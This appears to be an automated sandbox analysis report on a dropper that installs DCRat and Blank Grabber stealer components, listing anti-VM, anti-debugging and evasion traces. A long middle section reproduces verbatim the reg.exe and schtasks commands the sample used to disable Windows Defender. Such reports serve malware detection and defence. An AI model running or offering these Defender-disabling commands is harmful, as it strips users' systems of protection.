                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 174113A second address: 17B2FE5 instructions: 0x00000000 rdtsc 0x00000002 rol cl, 1 0x00000004 sbb eax, 63AF11CCh 0x00000009 xor bl, cl 0x0000000b seto dl 0x0000000e shrd edx, esp, 0000004Ch 0x00000012 mov eax, dword ptr [esp+ecx] 0x00000015 sub esi, 00000004h 0x0000001b cmc 0x0000001c mov dword ptr [esi], eax 0x0000001e bswap dx 0x00000021 sub ebp, 00000004h 0x00000027 mov edx, 671105E1h 0x0000002c ror dh, cl 0x0000002e and dx, bp 0x00000031 mov edx, dword ptr [ebp+00h] 0x00000035 clc 0x00000036 stc 0x00000037 jmp 00007F5F24C88A4Bh 0x0000003c xor edx, ebx 0x0000003e jmp 00007F5F24CDAF62h 0x00000043 dec edx 0x00000044 not edx 0x00000046 stc 0x00000047 sub edx, 6DFA0E04h 0x0000004d neg edx 0x0000004f test eax, ecx 0x00000051 xor ebx, edx 0x00000053 test edi, eax 0x00000055 test ebx, 24170DC1h 0x0000005b cmp di, 69B9h 0x00000060 add edi, edx 0x00000062 jmp 00007F5F24A6BA81h 0x00000067 lea ecx, dword ptr [esp+60h] 0x0000006b cmc 0x0000006c cmp esi, 19ED38B6h 0x00000072 test si, 388Fh 0x00000077 cmp esi, ecx 0x00000079 ja 00007F5F24D6CE52h 0x0000007f jmp edi 0x00000081 mov ecx, dword ptr [esi] 0x00000083 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 17C3D5D second address: 172F936 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push B8ADBE03h 0x00000008 call 00007F5F24B79827h 0x0000000d push ecx 0x0000000e mov cx, 3A58h 0x00000012 push esi 0x00000013 movsx esi, di 0x00000016 setbe cl 0x00000019 push ebx 0x0000001a push edx 0x0000001b jmp 00007F5F24BD4779h 0x00000020 push eax 0x00000021 cbw 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 172F936 second address: 172F94F instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 push edi 0x00000004 bswap edi 0x00000006 lahf 0x00000007 pushfd 0x00000008 movzx dx, al 0x0000000c cwd 0x0000000e bt esi, edi 0x00000011 mov ecx, 00000000h 0x00000016 rcl bh, FFFFFF9Ah 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: B55C05 second address: BD240F instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 rol cl, 1 0x00000006 shrd dx, bp, 00000038h 0x0000000b or dx, 3F3Eh 0x00000010 add cl, 0000001Ah 0x00000013 jmp 00007F5F24C6D9E5h 0x00000018 neg cl 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 720750 second address: 720769 instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 push edi 0x00000004 bswap edi 0x00000006 lahf 0x00000007 pushfd 0x00000008 movzx dx, al 0x0000000c cwd 0x0000000e bt esi, edi 0x00000011 mov ecx, 00000000h 0x00000016 rcl bh, FFFFFF9Ah 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 7427D9 second address: 7427DC instructions: 0x00000000 rdtsc 0x00000002 pop esi 0x00000003 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 718731 second address: 71873B instructions: 0x00000000 rdtsc 0x00000002 setbe al 0x00000005 pop ebx 0x00000006 movsx dx, dh 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 71873B second address: 720750 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 movzx eax, dx 0x00000006 mov edx, 46DB0D08h 0x0000000b cmovnl edi, edx 0x0000000e pop edi 0x0000000f cwde 0x00000010 movzx edx, dx 0x00000013 jmp 00007F5F24C0A6FFh 0x00000018 pop edx 0x00000019 lahf 0x0000001a cbw 0x0000001c movzx ax, al 0x00000020 pop eax 0x00000021 pop ecx 0x00000022 movzx esi, ax 0x00000025 pop esi 0x00000026 jmp 00007F5F248C05A2h 0x0000002b ret 0x0000002c push 383489E9h 0x00000031 call 00007F5F24847432h 0x00000036 push ecx 0x00000037 mov cx, 3A58h 0x0000003b push esi 0x0000003c movsx esi, di 0x0000003f setbe cl 0x00000042 push ebx 0x00000043 push edx 0x00000044 jmp 00007F5F248253E5h 0x00000049 push eax 0x0000004a cbw 0x0000004c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 6FCFCD second address: 6FCFD5 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 xchg edi, ecx 0x00000005 pop ebp 0x00000006 xchg eax, edx 0x00000007 pop edi 0x00000008 rdtsc
                        Tries to evade analysis by execution special instruction (VM detection)
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSpecial instruction interceptor: First address: F79280 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSpecial instruction interceptor: First address: EF62C9 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSpecial instruction interceptor: First address: 17C3D5D instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSpecial instruction interceptor: First address: 18C35B6 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMemory allocated: 239BBC40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMemory allocated: 239D54C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\blockweb\portrefNet.exeMemory allocated: AA0000 memory reserve | memory write watch
                        Source: C:\blockweb\portrefNet.exeMemory allocated: 1A560000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\blockweb\portrefNet.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\blockweb\portrefNet.exeWindow / User API: threadDelayed 1264
                        Source: C:\blockweb\portrefNet.exeWindow / User API: threadDelayed 641
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 5568Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 2000Thread sleep count: 262 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 2000Thread sleep count: 236 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 4520Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 8156Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\blockweb\portrefNet.exe TID: 7572Thread sleep count: 1264 > 30
                        Source: C:\blockweb\portrefNet.exe TID: 7584Thread sleep count: 641 > 30
                        Source: C:\blockweb\portrefNet.exe TID: 7540Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\blockweb\portrefNet.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,35_2_0073A5F4
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,35_2_0074B8E0
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074DD72 VirtualQuery,GetSystemInfo,35_2_0074DD72
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\blockweb\portrefNet.exeThread delayed: delay time: 922337203685477
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\Documents\desktop.ini
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\AppData
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\AppData\Local\Temp
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\Desktop\desktop.ini
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\AppData\Local
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5A0000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vboxtray
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vboxservice
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5A0000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: qemu-ga
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmwareuser
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5A0000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmusrvc
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmwareservice+discordtokenprotector
                        Source: wscript.exe, 00000025.00000003.1899504654.0000000000B0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmsrvc
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmtoolsd
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmwaretray
                        Source: wscript.exe, 00000025.00000003.1899504654.0000000000B0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
                        Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                        Source: 52cheatand52rat.exe, 00000024.00000002.1872950958.00000239BBA11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeAPI call chain: ExitProcess graph end nodegraph_35-24332
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Hides threads from debuggers
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSystem information queried: KernelDebuggerInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess queried: DebugObjectHandleJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeProcess queried: DebugObjectHandleJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0075866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_0075866F
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0075753D mov eax, dword ptr fs:[00000030h]35_2_0075753D
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0075B710 GetProcessHeap,35_2_0075B710
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\blockweb\portrefNet.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074F063 SetUnhandledExceptionFilter,35_2_0074F063
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_0074F22B
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0075866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_0075866F
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_0074EF05
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Disables Windows Defender (deletes autostart)
                        Source: C:\Windows\SysWOW64\reg.exeRegistry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpywareJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeProcess created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /DisableJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /DisableJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /DisableJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /DisableJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /DisableJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeProcess created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockweb\portrefNet.exe "C:\blockweb\portrefNet.exe"
                        Source: C:\blockweb\portrefNet.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074ED5B cpuid 35_2_0074ED5B
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: GetLocaleInfoW,GetNumberFormatW,35_2_0074A63C
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe VolumeInformationJump to behavior
                        Source: C:\blockweb\portrefNet.exeQueries volume information: C:\blockweb\portrefNet.exe VolumeInformation
                        Source: C:\blockweb\portrefNet.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,35_2_0074D5D4
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073ACF5 GetVersionExW,35_2_0073ACF5
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Disable Windows Defender real time protection (registry)
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiSpyware 1Jump to behavior
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiVirus 1Jump to behavior
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngineRegistry value created: MpEnablePus 0Jump to behavior
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableBehaviorMonitoring 1Jump to behavior
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1Jump to behavior
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableOnAccessProtection 1Jump to behavior
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1Jump to behavior
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableScanOnRealtimeEnable 1Jump to behavior
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ReportingRegistry value created: DisableEnhancedNotifications 1Jump to behavior
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNetRegistry value created: DisableBlockAtFirstSeen 1Jump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
